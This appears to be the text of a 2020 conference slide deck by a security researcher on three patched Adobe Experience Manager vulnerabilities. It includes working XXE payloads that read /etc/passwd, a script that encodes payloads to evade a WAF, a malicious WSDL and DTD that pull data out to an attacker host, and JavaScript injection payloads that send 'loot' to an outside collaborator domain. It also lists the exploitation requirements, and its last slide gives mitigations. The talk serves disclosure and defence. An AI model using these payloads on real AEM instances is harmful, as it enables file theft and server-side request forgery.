Mikhail Egorov gave a presentation on security vulnerabilities in Adobe Experience Manager (AEM) applications. He discussed three vulnerabilities - CVE-2019-8086, CVE-2019-8087, and CVE-2019-8088 - which involved XML external entity injection, JavaScript code injection, and ways to exploit them. He explained the technical details of each vulnerability and provided examples of payloads and steps required for exploitation. Egorov concluded by recommending keeping AEM updated, blocking anonymous write access to certain paths, and removing demo content to help prevent security issues.

1. EUROPE'S LEADING AEM DEVELOPER CONFERENCE
28th – 30th SEPTEMBER 2020
A Hacker's perspective on AEM applications security
Mikhail Egorov, Security researcher & bug hunter

2. 2
Intro

3. whoami
3
▪ Security researcher & full-time bug hunter
▪ https://bugcrowd.com/0ang3el
▪ https://hackerone.com/0ang3el
▪ Conference speaker
▪ https://www.slideshare.net/0ang3el
▪ https://speakerdeck.com/0ang3el

4. whoami
4
▪ Toolset for AEM hacking
▪ https://github.com/0ang3el/aem-hacker

5. 5
APSB19-48

6. APSB19-48
6
▪ http://helpx.adobe.com/security/products/experi
ence-manager/apsb19-48.html
▪ CVE-2019-8086 / XML eXternal Entity Injection
▪ CVE-2019-8087 / XML eXternal Entity Injection
▪ CVE-2019-8088 / JavaScript Code Injection

7. XML eXternal Entity (XXE) attacks
7
▪ Do we see the parsed XML?
▪ What’s allowed by the XML parser?
▪ General external entities
▪ Parameter external entities
▪ External DTD loading

8. XML eXternal Entity (XXE) attacks
8
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>
<foo>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync … </foo>

9. XML eXternal Entity (XXE) attacks
9
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY % xxe SYSTEM "http://127.0.0.1:4503">
%xxe;
]>
<foo></foo>

10. XML eXternal Entity (XXE) attacks
10
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo SYSTEM "http://127.0.0.1:4503" []>
<foo></foo>

11. CVE-2019-8086
11
▪ GuideInternalSubmitServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.internalsubmit"}
)})
public class GuideInternalSubmitServlet
…

12. CVE-2019-8086
12

13. CVE-2019-8086
13

14. CVE-2019-8086
14
▪ XXE payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE afData [
<!ENTITY a SYSTEM "file:///etc/passwd">
]>
<afData>&a;</afData>

15. CVE-2019-8086
15

16. CVE-2019-8086
16
▪ Exploitation hints
▪ We can JSON-encode XXE payload to bypass a WAF
▪ In Java we can list directory content
▪ /proc/self/cwd

17. CVE-2019-8086
17
▪ JSON-encoding
data = '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE afData [<!ENTITY
a SYSTEM "file:///etc/passwd">]><afData>&a;</afData>'
result = "“
for c in data:
result = result + "u00%02x" % ord(c)
print result

18. CVE-2019-8086
18

19. CVE-2019-8086
19
▪ XXE payload
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE afData [
<!ENTITY a SYSTEM "file:///etc">
]>
<afData>&a;</afData>

20. CVE-2019-8086
20

21. CVE-2019-8086
21
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/

22. CVE-2019-8086
22
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ Only blind SSRF for some versions
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE afData SYSTEM "http://localhost:4503" []>
<afData></afData>

23. CVE-2019-8087
23
▪ WSDLInvokerServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.wsdl"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
)})
public class WSDLInvokerServlet
…

24. CVE-2019-8087
24

25. CVE-2019-8087
25

26. CVE-2019-8087
26
▪ WSDL example
▪ https://cs.au.dk/~amoeller/WWW/webservices/wsdlexample.html

27. CVE-2019-8087
27

28. CVE-2019-8087
28
▪ Malicious xxe.wsdl
<?xml version="1.0"?>
<!DOCTYPE definitions [
<!ENTITY % dtd SYSTEM "http://attacker:1337/loot.dtd">
%dtd;
%param1;
]>
<definitions name="StockQuote"
…
<operation name="GetLastTradePrice">
<soap:operation soapAction="&internal;"/>
…

29. CVE-2019-8087
29
▪ Malicious loot.dtd
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY internal '%payload;'>">

30. CVE-2019-8087
30

31. CVE-2019-8087
31
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/

32. CVE-2019-8087
32
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ On some AEM versions WSDLInvokerServlet is not
present

33. CVE-2019-8088
33
▪ GuideSubmitServlet
@Service({Servlet.class})
@Properties({@Property(
name = "sling.servlet.resourceTypes",
value = {"fd/af/components/guideContainer"}
), @Property(
name = "sling.servlet.methods",
value = {"POST"}
), @Property(
name = "sling.servlet.selectors",
value = {"af.submit", "af.agreement", "af.signSubmit"}
)})
public class GuideSubmitServlet extends SlingAllMethodsServlet {
…

34. CVE-2019-8088
34

35. CVE-2019-8088
35

36. CVE-2019-8088
36

37. CVE-2019-8088
37

38. CVE-2019-8088
38

39. CVE-2019-8088
39
▪ Sandboxed Rhino engine on some AEM versions
▪ No RCE
▪ Sandbox allows network interactions
▪ SSRF w/ ability to see the response

40. CVE-2019-8088
40
▪ JS payload
');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
rator.net');//

41. CVE-2019-8088
41

42. CVE-2019-8088
42

43. CVE-2019-8088
43
▪ JS payload
');jQuery.get('http://727a14ifhq8on9vakssk6agtlkrafz.burpcollabo
rator.net',function(data){jQuery.get('http://727a14ifhq8on9vakss
k6agtlkrafz.burpcollaborator.net',{loot:data})});//

44. CVE-2019-8088
44

45. CVE-2019-8088
45

46. CVE-2019-8088
46
▪ Exploitation requirements
▪ There should be a node with
fd/af/components/guideContainer resource type
▪ property=sling:resourceType&property.value=fd/af/comp
onents/guideContainer
▪ Attacker should have a jcr:write access
somewhere
▪ /content/usergenerated/etc/commerce/smartlists/

47. CVE-2019-8088
47
▪ Exploitation requirements
▪ Doesn’t work equally on different AEM versions
▪ RCE or SSRF

48. APSB19-48
48
▪ Keep AEM up to date
▪ http://helpx.adobe.com/security/products/experie
nce-manager/apsb19-48.html
▪ Block jcr:write access for anonymous user
▪ /content/usergenerated/etc/commerce/smartlists/
▪ Remove demo content (Geometrixx, WeRetail, …)

49. 49
Thank you
@0ang3el